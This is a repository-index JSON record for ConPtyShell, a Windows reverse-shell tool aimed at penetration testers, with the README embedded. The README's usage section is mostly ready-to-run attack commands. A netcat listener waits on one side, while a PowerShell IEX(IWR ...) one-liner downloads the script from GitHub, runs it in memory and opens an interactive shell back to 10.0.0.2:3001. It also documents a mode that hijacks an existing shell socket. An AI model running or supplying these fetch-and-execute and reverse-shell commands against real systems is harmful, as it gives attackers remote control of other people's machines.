{"id":13776088,"url":"https://github.com/antoniococo/conptyshell","last_synced_at":"2025-04-12T18:40:05.885Z","repository":{"id":36156474,"uuid":"208354392","full_name":"antonioCoco/ConPtyShell","owner":"antonioCoco","description":"ConPtyShell - Fully Interactive Reverse Shell for Windows","archived":false,"fork":false,"pushed_at":"2023-01-20T10:52:52.000Z","size":14074,"stargazers_count":1096,"open_issues_count":4,"forks_count":169,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-04-03T20:12:23.690Z","etag":null,"topics":["conpty","csharp","penetration-testing","powershell","shell","terminal"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/antonioCoco.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-09-13T22:11:18.000Z","updated_at":"2025-04-01T19:20:23.000Z","dependencies_parsed_at":"2023-02-12T01:31:44.624Z","dependency_job_id":null,"html_url":"https://github.com/antonioCoco/ConPtyShell","commit_stats":null,"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/antonioCoco%2FConPtyShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/antonioCoco","download_url":"https://codeload.github.com/antonioCoco/ConPtyShell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248616377,"owners_count":21134070,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["conpty","csharp","penetration-testing","powershell","shell","terminal"],"created_at":"2024-08-03T17:02:00.058Z","updated_at":"2025-04-12T18:40:05.856Z","avatar_url":"https://github.com/antonioCoco.png","language":"PowerShell","readme":"# ConPtyShell\nConPtyShell is a Fully Interactive Reverse Shell for Windows systems.\n\nThe introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.\nConPtyShell uses this feature to literally transform your bash in a remote powershell.\n\n\u003cp\u003eBriefly, it creates a Pseudo Console and attaches 2 pipes.\u003cbr\u003e\nThen it creates the shell process (default powershell.exe) attaching the Pseudo Console with redirected input/output.\u003cbr\u003e\nThen starts 2 Threads for Async I/O:\u003cbr\u003e\n- one thread for reading from the socket and writing to Pseudo Console input pipe;\u003cbr\u003e\n- the second thread for reading from the Pseudo Console output pipe and writing to the socket.\u003c/p\u003e\n\nConPtyShell has also the magic flag \"Upgrade\" that transform your current shell in a fully interactive one, use it if you don't want to use a new connection and want to hijack your current shell socket :)\n\nIf you want to know further information regarding ConPty you can find a great article [1] in the references section.\n\n**NOTE: ConPtyShell uses the function \u003ca href=\"https://docs.microsoft.com/en-us/windows/console/createpseudoconsole\"\u003eCreatePseudoConsole()\u003c/a\u003e. This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).**\n\n**NOTE2: If the ConPTY is not available on the target system you will get a normal netcat-like interactive shell.**\n\n## Requirements\n\u003cp\u003eClient Side: Windows version \u003e= 10 / 2019 1809 (build \u003e= 10.0.17763)\u003c/p\u003e\n\u003cp\u003eServer Side: any tcp listener, i.e. netcat\u003c/p\u003e\n\n## Usage\n\nIt's important to have the same rows and cols size between your terminal and the remote terminal if you want to have an aligned output on the shell.\n\n#### Method 1\nIn this method the terminal size is set without you pass the rows and cols parameters to Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty raw -echo; (stty size; cat) | nc -lvnp 3001\n```\n\n##### Client Side:\n\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001\n```\n\n#### Method 2\nIf you prefer to have more freedom on the tcp listener and your terminal you can proceed with a \"Manual\" way to get the reverse shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty size\nnc -lvnp 3001\nWait For connection\nctrl+z\nstty raw -echo; fg[ENTER]\n```\n##### Client Side:\nHere you should use the values read from ```stty size``` command in the Parameters -Rows and -Cols\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 24 -Cols 80\n```\n\n#### Method 3 - Upgrade\nYou can also upgrade your current shell to a fully interecative shell. In this case it's important that you set rows and cols size when calling the Invoke-ConPtyShell function:\n\n##### Server Side:\n```\nstty size\nnc -lvnp 3001\nWait For connection\nctrl+z\nstty raw -echo; fg[ENTER]\n```\n##### Client Side:\nHere you should use the values read from ```stty size``` command in the Parameters -Rows and -Cols\n\n```\nIEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -Upgrade -Rows 24 -Cols 80\n```\n\n## Change Console Size\n\nIn any case if you resize your terminal while you have already open the remote shell you can change the rows and cols size directly from powershell pasting the following code:\n\n```\n$width=80\n$height=24\n$Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height)\n$Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height)\n```\n\n## Demo\nBelow you can watch 2 demos. The first gif using the **Method 1** with the compiled assemlby in exe format, the second gif is showing the **Method 3** by upgrading your current shell with the ps1 script:\n\n#### Method 1\n\n\u003cimg src=\"demo_1.gif\"\u003e\n\n#### Method 3 - Upgrade demo\n\n\u003cimg src=\"demo_2.gif\"\u003e\n\n## References\n\n1. https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/\n2. https://github.com/microsoft/terminal\n3. https://www.usenix.org/conference/usenixsecurity20/presentation/niakanlahiji\n4. https://adepts.of0x.cc/shadowmove-hijack-socket/\n\n## Credits\n\n- LupMan\n","funding_links":[],"categories":["\u003ca id=\"01e6651181d405ecdcd92a452989e7e0\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"e9f97504fbd14c8bb4154bd0680e9e62\"\u003e\u003c/a\u003e反向代理"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniococo%2Fconptyshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fantoniococo%2Fconptyshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantoniococo%2Fconptyshell/lists"}